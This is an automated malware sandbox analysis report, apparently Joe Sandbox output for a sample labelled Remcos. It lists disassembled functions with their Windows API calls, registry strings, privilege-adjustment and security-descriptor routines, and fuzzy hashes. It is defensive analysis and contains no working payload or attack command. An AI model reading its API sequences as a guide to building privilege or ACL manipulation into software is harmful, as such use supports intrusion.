                                                                                                                                control_flow_graph 774 1f7d1b-1f7d40 SetProcessMitigationPolicy
                                                                                                                                APIs
                                                                                                                                • SetProcessMitigationPolicy.KERNEL32(00000000,?,00000008,?,?,?,001F7D64,001FA2D0,00000024,001F9480,001F0000,00000000,00000002,0000000A), ref: 001F7D39
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MitigationPolicyProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1088084561-0
                                                                                                                                • Opcode ID: cad21ba0526ab535567148da73156599e800d8bccde8f578e51db4f7afd6698e
                                                                                                                                • Instruction ID: 3bb6fe9d7cae398952313b9bd6b74fca48e314e9c46ed9c47575a3bfaa3d5437
                                                                                                                                • Opcode Fuzzy Hash: cad21ba0526ab535567148da73156599e800d8bccde8f578e51db4f7afd6698e
                                                                                                                                • Instruction Fuzzy Hash: 8FD09EB0514248BEEB48CB95D80EFAE7EACE744314F10419DB04593281EAF16A459765
                                                                                                                                Function 001F7DB7 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 775 1f7db7-1f7dc9 call 1f8f5a ExitProcess
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExitProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 621844428-0
                                                                                                                                • Opcode ID: be1e7c4e767d75fecdb5ee1d0bad211457be1e2943492cff0c5ed98092fd5a23
                                                                                                                                • Instruction ID: 5b66a22c8545879fd00ed8c7623cfea3901f642dda3d0fe98a44aaaeeade148e
                                                                                                                                • Opcode Fuzzy Hash: be1e7c4e767d75fecdb5ee1d0bad211457be1e2943492cff0c5ed98092fd5a23
                                                                                                                                • Instruction Fuzzy Hash: 1CB09B71C05209DFCF009FB0D9070AC7B31BF54321F100240D921321A0C7310D70DA71
                                                                                                                                Function 001F87D4 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 779 1f87d4-1f87dd 780 1f87df-1f87e1 GlobalFree 779->780 781 1f87e7-1f87f4 779->781 780->781
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeGlobal
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2979337801-0
                                                                                                                                • Opcode ID: 3fc530449f6b956998685460263aab840c9904894871bd0abf89a95d6ab37125
                                                                                                                                • Instruction ID: 52467e73404a24a837d2a7dbea7a80c06a50c01b1654b8cffea8f13cfd2c9b25
                                                                                                                                • Opcode Fuzzy Hash: 3fc530449f6b956998685460263aab840c9904894871bd0abf89a95d6ab37125
                                                                                                                                • Instruction Fuzzy Hash: 31D01271011625CFD7309F14E508DA2BBE5EF40718F21886EE4E983510DB72E88ACB40

                                                                                                                                Non-executed Functions

                                                                                                                                Function 001F31A9 Relevance: 78.6, APIs: 52, Instructions: 599memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F3256
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3274
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F3292
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F32B0
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F32CE
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F32F0
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F330E
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F332C
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F334A
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000014,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3368
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F33CF
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F33EC
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F340A
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3428
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F3446
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3468
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F34A2
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F34C0
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F34DE
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3500
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F3548
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3566
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F3584
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F35A6
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F35C4
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F35E2
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F3628
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3646
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F3664
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3686
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F36AE
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F36CC
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F36EA
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3707
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F3725
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F3747
                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 001F37A0
                                                                                                                                • memset.MSVCRT ref: 001F37C5
                                                                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 001F37E8
                                                                                                                                • InitializeAcl.ADVAPI32(?,?,00000002), ref: 001F3816
                                                                                                                                • AddAccessAllowedAce.ADVAPI32(?,00000002,?,?), ref: 001F3842
                                                                                                                                • GetAce.ADVAPI32(?,?,?), ref: 001F385D
                                                                                                                                • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 001F3887
                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001F389D
                                                                                                                                • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 001F38AE
                                                                                                                                • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 001F38C7
                                                                                                                                • GetSecurityDescriptorLength.ADVAPI32(?), ref: 001F38D6
                                                                                                                                • MakeSelfRelativeSD.ADVAPI32(?,?,?), ref: 001F38F3
                                                                                                                                • GetLastError.KERNEL32 ref: 001F38FD
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 001F3918
                                                                                                                                • GetLastError.KERNEL32 ref: 001F3920
                                                                                                                                • FreeSid.ADVAPI32(?), ref: 001F393D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeInitialize$Allocate$DescriptorSecurity$ErrorGlobalLastLength$AccessAllocAllowedDaclGroupMakeOwnerRelativeSelfmemset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3802846876-0
                                                                                                                                • Opcode ID: 139c35418e6bae600f47f6ff3ad380a3c78d2ff5486e310ad909f77fae8b5500
                                                                                                                                • Instruction ID: 7e790407e21e93967271c2b00b2b3ad092c0c80ac6ba6dc00deaa3b0c07afddc
                                                                                                                                • Opcode Fuzzy Hash: 139c35418e6bae600f47f6ff3ad380a3c78d2ff5486e310ad909f77fae8b5500
                                                                                                                                • Instruction Fuzzy Hash: 00123971508349AFDB309F60DC88BBBB7E9FB84745F10482DB699C2260DB71D945CB52
                                                                                                                                Function 001F59F2 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 136registrystringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetLastError.KERNEL32(00000020,00000000,00000000), ref: 001F5A12
                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Debug,00000000,00000000,?,?), ref: 001F5A8A
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 001F5AAA
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 001F5ABF
                                                                                                                                • RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Installer\CA,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 001F5B14
                                                                                                                                • RegSetValueExW.ADVAPI32(?,LastError,00000000,00000004,?,00000004), ref: 001F5B35
                                                                                                                                • lstrlenW.KERNEL32(ServerMain (CA): Open synchronization event failed), ref: 001F5B3C
                                                                                                                                • RegSetValueExW.ADVAPI32(?,LastErrorMessage,00000000,00000001,ServerMain (CA): Open synchronization event failed,00000000), ref: 001F5B59
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 001F5B65
                                                                                                                                • memset.MSVCRT ref: 001F5B84
                                                                                                                                • OutputDebugStringW.KERNEL32(?), ref: 001F5BD4
                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 001F5BDB
                                                                                                                                  • Part of subcall function 001F2F5E: RegOpenKeyExW.ADVAPI32(80000002,Software\Policies\Microsoft\Windows\Installer,00000000,00020019,001F5A48,?,001F5A48,?,?,?), ref: 001F2F8B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Value$CloseErrorLast$CreateDebugFreeGlobalOpenOutputQueryStringlstrlenmemset
                                                                                                                                • String ID: %s$($Debug$Error: %d. %s.$LastError$LastErrorMessage$P$ServerMain (CA): Open synchronization event failed$Software\Microsoft\Windows\CurrentVersion\Installer\CA$Software\Policies\Microsoft\Windows\Installer
                                                                                                                                • API String ID: 3407900974-1723650419
                                                                                                                                • Opcode ID: 8e3eb73b24bc4fd7fb1cc2c432694714aa029d1b26c95e36f4de618cfa57f804
                                                                                                                                • Instruction ID: 5d6c50a38a894805a42772d616874b80e58b3844e9155567a1d946ef7acf5b01
                                                                                                                                • Opcode Fuzzy Hash: 8e3eb73b24bc4fd7fb1cc2c432694714aa029d1b26c95e36f4de618cfa57f804
                                                                                                                                • Instruction Fuzzy Hash: 8B515EB190061CEBDB209B61DD89FBA77BAFB04344F0541A5F749A2160EF728E85DF90
                                                                                                                                Function 001F5C84 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 189libraryfilestringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • memset.MSVCRT ref: 001F5CAD
                                                                                                                                • GetACP.KERNEL32(00000641,?,00000000), ref: 001F5CE3
                                                                                                                                • LoadLibraryW.KERNEL32(KERNEL32), ref: 001F5CF0
                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 001F5D02
                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,0000000A), ref: 001F5D38
                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 001F5D46
                                                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,00000641,?,?,00000401,00000000), ref: 001F5D6C
                                                                                                                                • memset.MSVCRT ref: 001F5DEE
                                                                                                                                • GetVersionExW.KERNEL32(0000011C), ref: 001F5E07
                                                                                                                                  • Part of subcall function 001F2E35: _vsnwprintf.MSVCRT ref: 001F2E67
                                                                                                                                • lstrlenW.KERNEL32(?), ref: 001F5E96
                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,00000000), ref: 001F5EB4
                                                                                                                                • WriteFile.KERNEL32(001F2638,00000004,?,00000000), ref: 001F5ECF
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileLibraryWritememset$AddressFormatFreeInfoLoadLocaleMessageProcVersion_vsnwprintflstrlen
                                                                                                                                • String ID: GetUserDefaultUILanguage$Install error %i$KERNEL32
                                                                                                                                • API String ID: 2411759445-2065445882
                                                                                                                                • Opcode ID: d54856da36b5a924fdc102875be12f72906f11009e2605f9ad1727ad4faa02e8
                                                                                                                                • Instruction ID: 285ecc1d15365f7994d02344ce0320bae7f8f17fa3a1f832fbf91beb3695570d
                                                                                                                                • Opcode Fuzzy Hash: d54856da36b5a924fdc102875be12f72906f11009e2605f9ad1727ad4faa02e8
                                                                                                                                • Instruction Fuzzy Hash: 555170B150021CABEB109BA0DC49EBB77AEEB04364F140565F719E2191EB719E85CBA0
                                                                                                                                Function 001F2F93 Relevance: 15.1, APIs: 10, Instructions: 80threadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 001F2FC1
                                                                                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 001F2FC8
                                                                                                                                • GetLastError.KERNEL32 ref: 001F2FD2
                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 001F2FE9
                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 001F2FF0
                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001F300F
                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000030,?,?), ref: 001F303B
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 001F3044
                                                                                                                                • GetLastError.KERNEL32 ref: 001F304A
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 001F3068
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Token$CloseCurrentErrorHandleLastOpenProcessThread$AdjustLookupPrivilegePrivilegesValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 268630328-0
                                                                                                                                • Opcode ID: b1dd806aaa5c745aecb5abae8253ed0a00db3827eec48fbdea71c3a89c9afd4a
                                                                                                                                • Instruction ID: d18de02a7be874fbaf9b42dc9ffacaf5f1af0f36d0ce46b2ad14adbab66d977c
                                                                                                                                • Opcode Fuzzy Hash: b1dd806aaa5c745aecb5abae8253ed0a00db3827eec48fbdea71c3a89c9afd4a
                                                                                                                                • Instruction Fuzzy Hash: DE21F871A0020DEBDB109FA5ED49BBDBBBAEF04705F104026F606E6160DF71DA46DB64
                                                                                                                                Function 001F30F2 Relevance: 10.6, APIs: 7, Instructions: 65memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 001F3133
                                                                                                                                • GetLastError.KERNEL32(?,?), ref: 001F313D
                                                                                                                                • GetLengthSid.ADVAPI32(?,?,?), ref: 001F3148
                                                                                                                                • FreeSid.ADVAPI32(00000000), ref: 001F315E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateErrorFreeInitializeLastLength
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1611457584-0
                                                                                                                                • Opcode ID: abec752e307a4faf41a92f57f8a70bce4aca1d745dd6fd475e5e455cc0f657fe
                                                                                                                                • Instruction ID: f63b9c933cd458744a7497c10266a0e57be94d948c69de826f64b508e9176dd4
                                                                                                                                • Opcode Fuzzy Hash: abec752e307a4faf41a92f57f8a70bce4aca1d745dd6fd475e5e455cc0f657fe
                                                                                                                                • Instruction Fuzzy Hash: C411947090520CEFDB109FA4ED09BBFBB79FF08305F044829F526A25A0DB719984DB40
                                                                                                                                Function 001F9E35 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001F9E62
                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 001F9E71
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 001F9E7A
                                                                                                                                • GetTickCount.KERNEL32 ref: 001F9E83
                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 001F9E98
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1445889803-0
                                                                                                                                • Opcode ID: 34e410c87d13e2cc54fcf25a3ed779f9ec4e811062a6e2198ed94f3d7945e5f5
                                                                                                                                • Instruction ID: 058639f2fbd45b6d701808e6ec017a5ee21ea353f27ec5bfa2217e2476a174b7
                                                                                                                                • Opcode Fuzzy Hash: 34e410c87d13e2cc54fcf25a3ed779f9ec4e811062a6e2198ed94f3d7945e5f5
                                                                                                                                • Instruction Fuzzy Hash: 04110375D04208EBCB10DBB8EA487BEBBF5FF88314F55486AE406E7610EB309A40DB40
                                                                                                                                Function 001F7DD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • StartServiceCtrlDispatcherW.ADVAPI32(?), ref: 001F7DF2
                                                                                                                                • GetLastError.KERNEL32 ref: 001F7DFC
                                                                                                                                  • Part of subcall function 001F59F2: GetLastError.KERNEL32(00000020,00000000,00000000), ref: 001F5A12
                                                                                                                                  • Part of subcall function 001F59F2: RegQueryValueExW.ADVAPI32(?,Debug,00000000,00000000,?,?), ref: 001F5A8A
                                                                                                                                  • Part of subcall function 001F59F2: RegCloseKey.ADVAPI32(?), ref: 001F5AAA
                                                                                                                                  • Part of subcall function 001F59F2: GlobalFree.KERNEL32(?), ref: 001F5ABF
                                                                                                                                  • Part of subcall function 001F59F2: RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Installer\CA,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 001F5B14
                                                                                                                                  • Part of subcall function 001F59F2: RegSetValueExW.ADVAPI32(?,LastError,00000000,00000004,?,00000004), ref: 001F5B35
                                                                                                                                  • Part of subcall function 001F59F2: lstrlenW.KERNEL32(ServerMain (CA): Open synchronization event failed), ref: 001F5B3C
                                                                                                                                  • Part of subcall function 001F59F2: RegSetValueExW.ADVAPI32(?,LastErrorMessage,00000000,00000001,ServerMain (CA): Open synchronization event failed,00000000), ref: 001F5B59
                                                                                                                                  • Part of subcall function 001F59F2: RegCloseKey.ADVAPI32(?), ref: 001F5B65
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Value$CloseErrorLast$CreateCtrlDispatcherFreeGlobalQueryServiceStartlstrlen
                                                                                                                                • String ID: MSIServer$StartServiceCtrlDispatcher failed.
                                                                                                                                • API String ID: 2998827721-520530687
                                                                                                                                • Opcode ID: b39c7dc1bccbad30c3c3f48d9c3163001b909a4b7d16111b713bafe04b091347
                                                                                                                                • Instruction ID: 8e156305cbd094ef9b9ac1af310146116c0dd6b406cdc03a5c875982dcf88a97
                                                                                                                                • Opcode Fuzzy Hash: b39c7dc1bccbad30c3c3f48d9c3163001b909a4b7d16111b713bafe04b091347
                                                                                                                                • Instruction Fuzzy Hash: 17E09231E1010C9BDB00EBA599097BE7AF9AB50309F5044A49211F2281DFB0C906CB51
                                                                                                                                Function 001F95F0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,001F9726,001F1000), ref: 001F95F7
                                                                                                                                • UnhandledExceptionFilter.KERNEL32(001F9726,?,001F9726,001F1000), ref: 001F9600
                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409,?,001F9726,001F1000), ref: 001F960B
                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,001F9726,001F1000), ref: 001F9612
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3231755760-0
                                                                                                                                • Opcode ID: 631f01253e607ac17f2a6cb94147c148e7fde628b52d2566ad3165cee2145a29
                                                                                                                                • Instruction ID: 14e6db85bd325c954a5128615c7b3fdfd30866250f3aa5de9071d60e1d420aab
                                                                                                                                • Opcode Fuzzy Hash: 631f01253e607ac17f2a6cb94147c148e7fde628b52d2566ad3165cee2145a29
                                                                                                                                • Instruction Fuzzy Hash: 78D0E972048144BBDA002BE1FD0DA793F2AEB84656F454410F70986961DB755492CB65
                                                                                                                                Function 001F9C10 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(001F9BC0), ref: 001F9C15
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
